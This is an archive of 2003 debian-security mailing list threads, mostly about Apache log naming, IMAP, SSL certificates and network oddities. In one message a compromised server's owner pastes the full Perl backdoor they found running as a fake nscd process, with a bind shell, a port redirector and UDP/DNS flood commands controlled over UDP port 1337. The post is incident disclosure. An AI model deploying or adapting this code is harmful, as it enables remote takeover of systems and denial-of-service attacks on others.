Bom dia debian-security
Message to debian-security@lists.debian.org Ola debian-security GANHAMOS O PRÊMIO DE MELHOR SITE DO RAMO ==Estamos operando em Novo Formato== Confira em: escuta21.kit.netou http://www.escuta21.kit.net ei debian-security Cuidado com o que fala ao Celular... ele tb tem ouvidos... para remover o debian-security@lists.debian.org de nossa lista responda este e-mail e coloque remover nos perdoe o transtorno...ok? kandrak
IMAP is too secure...
Helo, I think my IMAP server has become too secure... I'm using the current version of "uw-imapd" and "libc-client2003debian", as listed in stable and stable-proposed-updates. I cannot log into my IMAP server any more... It keeps saying Invalid password. I can only assume it's using password encryption, but I don't know how to turn it off. It was never turned on before, but since the upgrade I've een unable to retrieve my mail through IMAP. It usually asks in the config whether I want clear-text passwords enabled or not, but it wasn't an option this time. Any ideas? I really need to get at the mail. Thanks in advance... Hobbs. -- Richard Hobbs <[EMAIL PROTECTED]> http://mongeese.co.uk | http://unixforum.co.uk "There's only one way of life, and that's your own" - The Levellers Registered Linux User: 313906 _ Send all your jokes to [EMAIL PROTECTED] !! To subscribe, email: [EMAIL PROTECTED] smime.p7s Description: S/MIME cryptographic signature
apache
Hi. I would like to use date string in apache log file names. Is there a way to use some directive in httpd.conf to be parsed as shell command like `date +%Y%m%d` or some other way to solve the problem? I will use logrotate mechanism of debian, and this date string could be used only for file creation after apache process receives SIGUSR1. -- Pagarbiai IT sistemų administratorius Martynas Domarkas tel.: +370 698 44331
Re: apache
Martynas Domarkas wrote: > Hi. I would like to use date string in apache log file names. Is there a > way to use some directive in httpd.conf to be parsed as shell command > like `date +%Y%m%d` or some other way to solve the problem? I will use > logrotate mechanism of debian, and this date string could be used only > for file creation after apache process receives SIGUSR1. Grab the cronolog package, its easier and less intrusive. -- Jamie Heilman http://audible.transient.net/~jamie/ "We must be born with an intuition of mortality. Before we know the words for it, before we know there are words, out we come bloodied and squalling with the knowledge that for all the compasses in the world, there's only one direction, and time is its only measure." -Rosencrantz
Re: apache
An, 2003-06-10 12:01, Jamie Heilman rašė: > Martynas Domarkas wrote: > > Hi. I would like to use date string in apache log file names. Is there a > > way to use some directive in httpd.conf to be parsed as shell command > > like `date +%Y%m%d` or some other way to solve the problem? I will use > > logrotate mechanism of debian, and this date string could be used only > > for file creation after apache process receives SIGUSR1. > > Grab the cronolog package, its easier and less intrusive. > > -- > Jamie Heilman http://audible.transient.net/~jamie/ > "We must be born with an intuition of mortality. Before we know the words > for it, before we know there are words, out we come bloodied and squalling > with the knowledge that for all the compasses in the world, there's only > one direction, and time is its only measure."-Rosencrantz Thanks, but I realy do not like instalation of another packages. There must be a way to do this with apache configuration. -- Pagarbiai IT sistemų administratorius Martynas Domarkas tel.: +370 698 44331
Re: apache
On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: [...] > > Thanks, but I realy do not like instalation of another packages. There > must be a way to do this with apache configuration. You could add a line to your /etc/logrotate.d/apache configuration, so it would look something like this: [...] postrotate /etc/init.d/apache reload > /dev/null mv -f $1.0 $1.`date +"%Y-%m-%d"` endscript [...] This would rename access.log.0 to access.log.2003-06-10 Regards, Teun Vink
Re: apache
An, 2003-06-10 12:56, Teun Vink rašė: > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: > [...] > > > > Thanks, but I realy do not like instalation of another packages. There > > must be a way to do this with apache configuration. > > You could add a line to your /etc/logrotate.d/apache configuration, > so it would look something like this: > > [...] >postrotate > /etc/init.d/apache reload > /dev/null > mv -f $1.0 $1.`date +"%Y-%m-%d"` >endscript > [...] > > This would rename access.log.0 to access.log.2003-06-10 > > > Regards, > > > Teun Vink > Thanks a lot. This is nice solution, but I still like apache do the job, and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have seen somewhere some piece of shell command in httpd.conf. -- Pagarbiai IT sistemų administratorius Martynas Domarkas tel.: +370 698 44331
Re[2]: apache
Perhaps I've got you wrong but wouldn't --- snip --- TransferLog "| /usr/sbin/rotatelogs /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800" --- end --- do it? Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300: > An, 2003-06-10 12:56, Teun Vink raðë: > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: > > [...] > > > > > > Thanks, but I realy do not like instalation of another packages. There > > > must be a way to do this with apache configuration. > > > > You could add a line to your /etc/logrotate.d/apache configuration, > > so it would look something like this: > > > > [...] > >postrotate > > /etc/init.d/apache reload > /dev/null > > mv -f $1.0 $1.`date +"%Y-%m-%d"` > >endscript > > [...] > > > > This would rename access.log.0 to access.log.2003-06-10 > > > > > > Regards, > > > > > > Teun Vink > > > > Thanks a lot. This is nice solution, but I still like apache do the job, > and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have > seen somewhere some piece of shell command in httpd.conf. > > > -- > Pagarbiai > IT sistemø administratorius > Martynas Domarkas > tel.: +370 698 44331 > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] Mit freundlichen Gruessen / Best regards Dominik Schulz
RE: OPENSSL
> I'm trying to generate a 40-bit certificate using OPENSSL.Can > anybody tell me if this is possible and with which package? The RSA keys used in X.509 certificates are typically 1024 or 2048 bits in length. What length the symmetric key used between two parties that have authenticated via X.509 certificates (with RSA keys) to subsequently protect their communication has, is not directly related to the certificate. There are web browsers that will negotiate 128 bits only if the certificate presented by the web server is a "step-up certificate". I'm not sure what makes a certificate a step-up certificate, however, nor if this restriction still applies to current browsers. Cheers, Tobias
Re: OPENSSL
Reckhard, Tobias wrote: There are web browsers that will negotiate 128 bits only if the certificate presented by the web server is a "step-up certificate". I'm not sure what makes a certificate a step-up certificate, however, nor if this restriction still applies to current browsers. The step up involved the browser checking the signer was a legitimate CA to sign a step-up cert and then performing the re-negotiation. The restriction disapeared when the crypto export laws were all relaxed. You have to go a fair way back (few years) to get a browser that still only supports 128bit symmetric in SGC mode. Cheers, Berin
Re: Re[2]: apache
An, 2003-06-10 13:46, Dominik Schulz rašė: > Perhaps I've got you wrong but wouldn't > --- snip --- > TransferLog "| /usr/sbin/rotatelogs > /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800" > --- end --- > do it? > > Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300: > > > An, 2003-06-10 12:56, Teun Vink raðë: > > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: > > > [...] > > > > > > > > Thanks, but I realy do not like instalation of another packages. There > > > > must be a way to do this with apache configuration. > > > > > > You could add a line to your /etc/logrotate.d/apache configuration, > > > so it would look something like this: > > > > > > [...] > > >postrotate > > > /etc/init.d/apache reload > /dev/null > > > mv -f $1.0 $1.`date +"%Y-%m-%d"` > > >endscript > > > [...] > > > > > > This would rename access.log.0 to access.log.2003-06-10 > > > > > > > > > Regards, > > > > > > > > > Teun Vink > > > > > > > Thanks a lot. This is nice solution, but I still like apache do the job, > > and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have > > seen somewhere some piece of shell command in httpd.conf. > > > > > > -- > > Pagarbiai > > IT sistemø administratorius > > Martynas Domarkas > > tel.: +370 698 44331 > > > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > Mit freundlichen Gruessen / Best regards > Dominik Schulz > Yes, of course. But in this case I will invoke rotatelogs... I don't like it. -- Pagarbiai IT sistemų administratorius Martynas Domarkas tel.: +370 698 44331
Bom dia debian-securityESCUTA21 em Novo Formato
Message to debian-security@lists.debian.org Ola debian-security GANHAMOS O PRÊMIO DE MELHOR SITE DO RAMO ==Estamos operando em Novo Formato== Confira em: escuta21.kit.netou http://www.escuta21.kit.net ei debian-security Cuidado com o que fala ao Celular... ele tb tem ouvidos... para remover o debian-security@lists.debian.org de nossa lista responda este e-mail e coloque remover nos perdoe o transtorno...ok? kandrak
Re: IMAP is too secure...
Hi Richard, Since libc-client2003debian it's only posible to use a SSL connection. Most clients support it, but if you really want to allow plaintext IMAP again, please run 'dpkg-reconfigure libc-client2003debian' and awnser Yes to 'Should plaintext passwords be enabled?'. To enable it manualy, create /etc/c-client.cf with the following contents: --8<-- I accept the risk set disable-plaintext nil --8<-- A better sollution would be to set your client to use SSL on port 993. The only thing you still have to worry about are the certificates. Jelmer - Original Message - From: "Hobbs, Richard" <[EMAIL PROTECTED]> To: Sent: Tuesday, June 10, 2003 8:32 AM Subject: IMAP is too secure... > Helo, > > I think my IMAP server has become too secure... I'm using the current > version of "uw-imapd" and "libc-client2003debian", as listed in stable and > stable-proposed-updates. > > I cannot log into my IMAP server any more... It keeps saying Invalid > password. I can only assume it's using password encryption, but I don't > know how to turn it off. > > It was never turned on before, but since the upgrade I've een unable to > retrieve my mail through IMAP. It usually asks in the config whether I > want clear-text passwords enabled or not, but it wasn't an option this > time. > > Any ideas? I really need to get at the mail. > > Thanks in advance... > > Hobbs. > > -- > Richard Hobbs <[EMAIL PROTECTED]> > http://mongeese.co.uk | http://unixforum.co.uk > > "There's only one way of life, and that's your own" - The Levellers > > Registered Linux User: 313906 > _ > Send all your jokes to [EMAIL PROTECTED] !! > To subscribe, email: [EMAIL PROTECTED] >
Re: Default Apache install not fit for multiple domains/users
Thank you for the information. Am I right that php-skripts then would need an execute-bit set? Currently they don't have ... On 9 Jun 2003 at 17:59, Jon wrote: > On Mon, 2003-06-09 at 17:28, Phillip Hofmeister wrote: > > -BEGIN PGP SIGNED MESSAGE- > > Hash: SHA1 > > > > On Mon, 09 Jun 2003 at 09:35:49PM +0200, Stefan Neufeind wrote: > > > But you mean starting with #! ?? How could I use the normal way of > > > setting a cgi-handler for calling .php-files? Know what I mean? > > > > > > Using Misc Binary-support (and therefor patching the kernel) seems > > > no solution to me. Isn't there some way to make it work using > > > Apache- features? > > > > MISC Binary is not patching the kernel. MISC Binary comes as an > > option with the stock kernel. You might have to compile your own > > kernel (I don't know, I haven't used a stock Debian kernel in a VERY > > long time...) > > > > The binfmt_misc kernel module is included in the stock Debian kernels, > AFAIK. There is a nice package, binfmt-support (ala > update-alternatives) that allows one to easily configure binfmt_misc: > > > Package: binfmt-support > Support for extra binary formats > > The binfmt_misc kernel module, contained in versions 2.1.43 and later > of the Linux kernel, allows system administrators to register > interpreters for various binary formats based on a magic number or > their file extension, and cause the appropriate interpreter to be > invoked whenever a matching file is executed. Think of it as a more > flexible version of the #! executable interpreter mechanism. > > This package provides an 'update-binfmts' script with which package > maintainers can register interpreters to be used with this module > without having to worry about writing their own init.d scripts, and > which sysadmins can use for a slightly higher-level interface to this > module.
Re: OPENSSL
I'm using a 128-bit-cert. But browsers that support less encryption (e.g. IE that comes with WinNT4) can't access my SSL-pages because the encryption doesn't allow degration. Is there any way to solve this prob? Using Apache with an official SSL-cert. PS: This just came to my mind when you said "step-up" - cause in my case it would be a "step-down", right? On 10 Jun 2003 at 21:49, Berin Lautenbach wrote: > Reckhard, Tobias wrote: > > There are web browsers that will negotiate 128 bits only if the > > certificate presented by the web server is a "step-up certificate". > > I'm not sure what makes a certificate a step-up certificate, > > however, nor if this restriction still applies to current browsers. > > The step up involved the browser checking the signer was a legitimate > CA to sign a step-up cert and then performing the re-negotiation. The > restriction disapeared when the crypto export laws were all relaxed. > You have to go a fair way back (few years) to get a browser that still > only supports 128bit symmetric in SGC mode.
re: strange broadcast packets
Hello, isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to dhcp requests from clients? Carpe Noctem, Kuba BIGHard Jakubik
unsubscibe
hi my name is loretta i got this really cool incredimail downloaded on my computer..but it does not work...I've tried every thing my email will come to the incredimail account but i can not respond so i don't want it any more can you please take it off so i can use my sbcglobal account again.I even had t sighn up for a new email address just so i could respond to some of my e mail.thats sad.PLEASE take it off Do you Yahoo!? Free online calendar with sync to Outlook(TM).
Re: Default Apache install not fit for multiple domains/users
On Tue, 2003-06-10 at 08:24, Stefan Neufeind wrote: > Thank you for the information. Am I right that php-skripts then would > need an execute-bit set? Currently they don't have ... > Unfortunately, yes. Otherwise you'll get a 500 Internal Server Error or the likes. - Jon -- [EMAIL PROTECTED] Administrator, tgpsolutions http://www.tgpsolutions.com signature.asc Description: This is a digitally signed message part
Re: Default Apache install not fit for multiple domains/users
On Tue, 10 Jun 2003 at 05:24:59PM +0200, Stefan Neufeind wrote: > Thank you for the information. Am I right that php-skripts then would > need an execute-bit set? Currently they don't have ... > They will be being treated like a normal binary file, so yes (that is, if you want yours scripts to work). If on the other hand, you don't want your sk|pt5 to work then you don't need to set the execute bit . -- Phillip Hofmeister PGP/GPG Key: http://www.zionlth.org/~plhofmei/ wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import -- Excuse #67: Typo in the code
Re: nautilus and portmapper port 111
Hi Phillip On Dienstag, 10-Jun-03 at 01:33:07, Phillip Hofmeister wrote: > On Tue, 10 Jun 2003 at 12:20:10AM +0100, Andreas W?st wrote: >> Hi >> >> Although I can see no evidence for portmapper being run by issuing >> "netstat -tu -l -ee -p", everytime nautilus is started it connects to >> port 111, and even gets an answer from there. And even after this >> connection, I can't see a server listening on port 111 via netstat. >> >> What is going on here? If I block port 111 nautilus wont start. >> >> How can I make sure portmapper is not being run, or at least only in >> a controlled manner, say for nautilus? > > > I usually use a netstat -apn (requires r00t). It will show you all > sockets (listening or otherwise) and what app owns them. The -n makes > it so it does not resolve the port numbers via /etc/service. No matter if I try netstat -apn or netstat -atunp as someone pointed out in private, it gives the same result as netstat -tu -l -ee -p, apart from the established connections, namely there is nothing listening in port 111. Furhtermore, package "portmap" is NOT installed, but there are working connections via 111 when nautilus starts up.. -- Best wishes, Andi
Re: strange broadcast packets
Hi > Hello, > > isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to > dhcp requests from clients? No lan here.. !! -- Best wishes, Andi
Re: Re[2]: apache
On Tue, 2003-06-10 at 09:49, Martynas Domarkas wrote: > An, 2003-06-10 13:46, Dominik Schulz rašė: > > Perhaps I've got you wrong but wouldn't > > --- snip --- > > TransferLog "| /usr/sbin/rotatelogs > > /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800" > > --- end --- > > do it? > > > > Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300: > > > > > An, 2003-06-10 12:56, Teun Vink raðë: > > > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: > > > > [...] > > > > > > > > > > Thanks, but I realy do not like instalation of another packages. There > > > > > must be a way to do this with apache configuration. > > > > > > > > You could add a line to your /etc/logrotate.d/apache configuration, > > > > so it would look something like this: > > > > > > > > [...] > > > >postrotate > > > > /etc/init.d/apache reload > /dev/null > > > > mv -f $1.0 $1.`date +"%Y-%m-%d"` > > > >endscript > > > > [...] > > > > > > > > This would rename access.log.0 to access.log.2003-06-10 > > > > > > > > > > > > Regards, > > > > > > > > > > > > Teun Vink > > > > > > > > > > Thanks a lot. This is nice solution, but I still like apache do the job, > > > and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have > > > seen somewhere some piece of shell command in httpd.conf. > > > > > > > > > -- > > > Pagarbiai > > > IT sistemø administratorius > > > Martynas Domarkas > > > tel.: +370 698 44331 > > > > > > > > > > > > -- > > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > > > > Mit freundlichen Gruessen / Best regards > > Dominik Schulz > > > > Yes, of course. But in this case I will invoke rotatelogs... I don't > like it. > > > -- > Pagarbiai > IT sistemų administratorius > Martynas Domarkas > tel.: +370 698 44331 IIUC, you are wanting to control the file name applied to rotated logs from Apache, but you seem to be of the belief that Apache itself is rotating the log files. Unless this has been added since I last read through the the Apache configuration documentation, I don't remember seeing the log rotation functionality being part of it (although I last read through the documenttation in entirety several years back.) It is handled by a separate package, on Debian most commonly logrotate, regardless of the name applied to the rotated file. -- Mark L. Kahnt, FLMI/M, ALHC, HIA, AIAA, ACS, MHP ML Kahnt New Markets Consulting Tel: (613) 531-8684 / (613) 539-0935 Email: [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
Re: strange broadcast packets
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote: > Hi > > > Hello, > > > > isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to > > dhcp requests from clients? > > No lan here.. !! That IP address might be used by your cable modem service as an internal management address to hand out IP addresses. Or it might even be your bridge (cable modem). In either case. This is not something to be worried about. In fact I made a special rule in my iptables so such packets don't get logged. Be well, - -- Phillip Hofmeister PGP/GPG Key: http://www.zionlth.org/~plhofmei/ wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import - -- Excuse #34: Heavy gravity fluctuation move computer to floor rapidly -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE+5iqFS3Jybf3L5MQRAvTTAJ9HjtzJ3VLuxePPG6Ph9ZOW9dYKgACfXpet jjtqPu0j7Se0dWS2gwScG10= =3kbY -END PGP SIGNATURE-
unsubscribe
Re: nautilus and portmapper port 111
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Andreas Wüst sent the following message Today: AW> No matter if I try netstat -apn or netstat -atunp as someone pointed out AW> in private, it gives the same result as netstat -tu -l -ee -p, apart AW> from the established connections, namely there is nothing listening in AW> port 111. Have you tried "rpcinfo -p localhost" to see if Nautilus is registering a connection to portmap? The newer Gnome installs (gnomevfs) depend on fam, which depends on portmap. I don't believe there is a direct dependency from core Nautilus to portmap, but possibly some of the Nautilus extras or vfs extrase are causing the dependency. - -- Chris Caldwell Information Systems Coordinator, Enterprise Systems Information Systems and Services, The George Washington University caldwell @ gwu . edu | +1 202.994.4674 (w) | +1 202.409.0878 (c) http://asclepius.tops.gwu.edu | GPG key ID: 0xE52D0BE8 "Formal education can rarely improve the character of a scoundrel." - Derek Bok, Harvard University -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE+5kId1YKAfuUtC+gRAiWJAJ9Cpr8WyWV061ppN9m6O1OXRmW9jwCfQHcl AWB5FF7DcvK7wMCroRqdn5M= =iqMD -END PGP SIGNATURE-
a weird script worm uploaded via php with debian 3.0 ?
Hello,
I logged in to my server today to find that
/usr/sbin/ncsd was running about 50 copies,
since I don't have BIND installed, obviously
something was up...they were also running with
the user www-data...
After a little bit of research I found a new
crontab entryFile: /tmp/crontab.LYukbF
0 * * * * /tmp/.nscdrecover
this starts at
auth.log.0:Jun 6 17:00:01 debian
PAM_unix[26934]: (cron) session opened for user
www-data by (uid=0)auth.log.0:Jun 6 17:00:02
debianPAM_unix[26934]: (cron) session closed for user
www-dataand runs every hour
and under SYSLOG it starts
syslog.3:Jun 6 16:27:27 debian crontab[26795]:
(www-data) LIST (www-data)syslog.3:Jun 6
16:27:28 debiancrontab[26798]:
(www-data) REPLACE (www-data)syslog.3:Jun 6
16:27:34debian crontab[26804]:
(www-data) LIST (www-data)syslog.3:Jun 6
16:27:34 debiancrontab[26807]:
(www-data) REPLACE (www-data)syslog.3:Jun 6
17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
(/tmp/.nscdrecover)
so I found /tmp/.ncsdrecover and it looks like
some kind of port scanner/trojan
the contents are pasted below
#!/usr/bin/perl -w
$pass = "J9YcGEyNypkzI";
$str = 'Mess with the best - die like a
rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;
sub redir
{
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
$sa = IO::Socket::INET->new( Proto => "tcp",
Listen => 1, ReuseAddr => 1,
LocalPort =>$port) or exit;
$sin = $sa->accept or exit;
close($sa);
alarm 0;
$sout = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $dest) or exit;$sin->autoflush(1);
$sout->autoflush(1);
$sel = IO::Select->new($sin, $sout);
while(@sock = $sel->can_read(180)) {
foreach $s(@sock) {
$buf = <$s>; exit unless($buf);
print $sout $buf if($s eq $sin);
print $sin $buf if($s eq $sout);
}}}
sub shell
{
my $port = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 1);
accept(X, S);
close(S);
alarm 0;
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
sub udp
{
my $host = shift;
my $time = shift;
$sock = IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $host,
PeerPort => int(rand 65535))
or exit;
$sock->autoflush(1);$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
print $sock $str while(1);
}
}
sub ddns
{
my $host = shift;
my $time = shift;
$sock = new IO::Socket::INET->new(Proto
=> 'udp', PeerAddr => $host,
PeerPort => 53) or exit;
$sock->autoflush(1);
$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
while(1) {
my $s = int(rand(89)+10);
my $r1 = int(rand(89)+10);
my $r2 = int(rand(89)+10);
my $r3 = int(rand(89)+10);
my $r4 = int(rand(89)+10);
send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, "/dev/null";
open STDERR, ">/dev/null";
POSIX::setsid();
$csock = IO::Socket::INET->new(Proto => 'udp',
LocalPort => 1337, ReuseAddr => 1) or
exit;while($string =<$csock>)
{
chop($string);
my ($pw, $cmd, $arg1, $arg2) = split "
", $string;next unless($cmd);
next unless($arg1);
next unless(crypt($pw, $pass) eq $pass);
if ($cmd eq "ping") {
my $bsock =
IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $arg1,
PeerPort => $arg2,
ReuseAddr => 1) or
next;
print $bsock"pong
".`uname -mnrs`;
close $bsock;
} elsif ($cmd eq "die") {
exit if(crypt($arg1, $pass) eq $pass);
} elsif ($cmd eq "redir") {
redir($arg1, $arg2) unless(fork);
} elsif ($cmd eq "shell") {
shell($arg1) unless(fork);
} elsif ($cmd eq "udp") {
udp($arg1, $arg2) unless(fork);
} elsif ($cmd eq "ddns") {
ddns($arg1, $arg2) unless(fork);
}
}
A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with debian so I could
have automatic updates and the like. I copied
over a few of the home directorys from the old
site.Then this all started after a user logged
in onFriday June 6th first login at 14:16 ending
14:24the script starts at 14:27
worldspe ftpd26405pm6-s104.amazon. Fri Jun
6 15:06 -
Re: apache
Martynas Domarkas wrote: > > Thanks, but I realy do not like instalation of another packages. There > must be a way to do this with apache configuration. Martynas Domarkas wrote: > > Thanks a lot. This is nice solution, but I still like apache do the job, > and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have > seen somewhere some piece of shell command in httpd.conf. Martynas Domarkas wrote: > > Yes, of course. But in this case I will invoke rotatelogs... I don't > like it. As, you've exhausted the other possibilites, why not read the fine manual: http://httpd.apache.org/docs/logs.html -- Jamie Heilman http://audible.transient.net/~jamie/ "Most people wouldn't know music if it came up and bit them on the ass." -Frank Zappa
cronjob stuck
Just ran across an interesting prob, wondered if anyone else has seen it. I added a repeating entry to /etc/cron.d/foo that ran every */5 minutes. I then tried to get rid of it... It will not die. I moved the file out of /etc/cron.d and it still is running. I cp'd the file and deleted the old one in case cron remembered the inode (rather a long shot). No change. I did /etc/init.d/cron stop; /etc/init.d/cron start; still it repeats. I did updatedb and locate cron; can't find it cached anywhere. cron doesn't seem to have any flush options and no indication that it should be caching across executions. I could certainly (I hope!) get rid of it by rebooting but I can't do that with this system at this time. Has anyone else had trouble making vixie cron STFU? Am I hallucinating? Is my brain in need of Coke and M&M's? -- -- IN MY NAME:Dale Amon, CEO/MD No Mushroom clouds over Islandone Society London and New York. www.islandone.org --
Re: strange broadcast packets
Hi Phillip On Dienstag, 10-Jun-03 at 19:59:40, Phillip Hofmeister wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote: >> Hi >> >>> Hello, >>> >>> isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to >>> dhcp requests from clients? >> >> No lan here.. !! > > That IP address might be used by your cable modem service as an > internal management address to hand out IP addresses. Or it might even > be your bridge (cable modem). In either case. This is not something to > be worried about. In fact I made a special rule in my iptables so such > packets don't get logged. Cool, thanks a lot for your help!! So, can I happily block them? As it seems, unfortunately I have to keep udp port 68 stateful open, to renew the dhcp lease, no? -- All the best, and really thanks a lot for your answers, Andi
Re: nautilus and portmapper port 111
Hello Chris Thank you for your answer! On Dienstag, 10-Jun-03 at 21:39:47, Chris Caldwell wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Andreas Wüst sent the following message Today: > >> No matter if I try netstat -apn or netstat -atunp as someone >> in private, it gives the same result as netstat -tu -l > -ee -p, apart AW> from the established connections, namely there is > nothing listening in AW> port 111. > > Have you tried "rpcinfo -p localhost" to see if Nautilus is > registering a connection to portmap? No, I haven't yet, but will do! > The newer Gnome installs > (gnomevfs) depend on fam, which depends on portmap. Umm, I thouth woody gnome wouldn't depend on fam, no? > I don't > believe there is a direct dependency from core Nautilus to > portmap, but possibly some of the Nautilus extras or vfs extrase > are causing the dependency. Yeah, it's strange. Even stranger, that nautilus won't start at all, if the connection to port 111 fails!! -- Best wishes, Andi
Re: cronjob stuck
On Tue, Jun 10, 2003 at 10:22:09PM +0100, Dale Amon wrote: > Has anyone else had trouble making vixie cron STFU? Am > I hallucinating? Is my brain in need of Coke and M&M's? Actually I've now done pretty much just that and discovered it was a strange coincidence... some other process was doing exactly the same thing my cronjob was to do with exactly the same 5 minute interval between runs and one minute off the execution times I expected!
apache
Hi. I would like to use date string in apache log file names. Is there a way to use some directive in httpd.conf to be parsed as shell command like `date +%Y%m%d` or some other way to solve the problem? I will use logrotate mechanism of debian, and this date string could be used only for file creation after apache process receives SIGUSR1. -- Pagarbiai IT sistemų administratorius Martynas Domarkas tel.: +370 698 44331 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: apache
Martynas Domarkas wrote: > Hi. I would like to use date string in apache log file names. Is there a > way to use some directive in httpd.conf to be parsed as shell command > like `date +%Y%m%d` or some other way to solve the problem? I will use > logrotate mechanism of debian, and this date string could be used only > for file creation after apache process receives SIGUSR1. Grab the cronolog package, its easier and less intrusive. -- Jamie Heilman http://audible.transient.net/~jamie/ "We must be born with an intuition of mortality. Before we know the words for it, before we know there are words, out we come bloodied and squalling with the knowledge that for all the compasses in the world, there's only one direction, and time is its only measure." -Rosencrantz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: apache
An, 2003-06-10 12:01, Jamie Heilman rašė: > Martynas Domarkas wrote: > > Hi. I would like to use date string in apache log file names. Is there a > > way to use some directive in httpd.conf to be parsed as shell command > > like `date +%Y%m%d` or some other way to solve the problem? I will use > > logrotate mechanism of debian, and this date string could be used only > > for file creation after apache process receives SIGUSR1. > > Grab the cronolog package, its easier and less intrusive. > > -- > Jamie Heilman http://audible.transient.net/~jamie/ > "We must be born with an intuition of mortality. Before we know the words > for it, before we know there are words, out we come bloodied and squalling > with the knowledge that for all the compasses in the world, there's only > one direction, and time is its only measure."-Rosencrantz Thanks, but I realy do not like instalation of another packages. There must be a way to do this with apache configuration. -- Pagarbiai IT sistemų administratorius Martynas Domarkas tel.: +370 698 44331 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: apache
On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: [...] > > Thanks, but I realy do not like instalation of another packages. There > must be a way to do this with apache configuration. You could add a line to your /etc/logrotate.d/apache configuration, so it would look something like this: [...] postrotate /etc/init.d/apache reload > /dev/null mv -f $1.0 $1.`date +"%Y-%m-%d"` endscript [...] This would rename access.log.0 to access.log.2003-06-10 Regards, Teun Vink -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: apache
An, 2003-06-10 12:56, Teun Vink rašė: > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: > [...] > > > > Thanks, but I realy do not like instalation of another packages. There > > must be a way to do this with apache configuration. > > You could add a line to your /etc/logrotate.d/apache configuration, > so it would look something like this: > > [...] >postrotate > /etc/init.d/apache reload > /dev/null > mv -f $1.0 $1.`date +"%Y-%m-%d"` >endscript > [...] > > This would rename access.log.0 to access.log.2003-06-10 > > > Regards, > > > Teun Vink > Thanks a lot. This is nice solution, but I still like apache do the job, and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have seen somewhere some piece of shell command in httpd.conf. -- Pagarbiai IT sistemų administratorius Martynas Domarkas tel.: +370 698 44331 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re[2]: apache
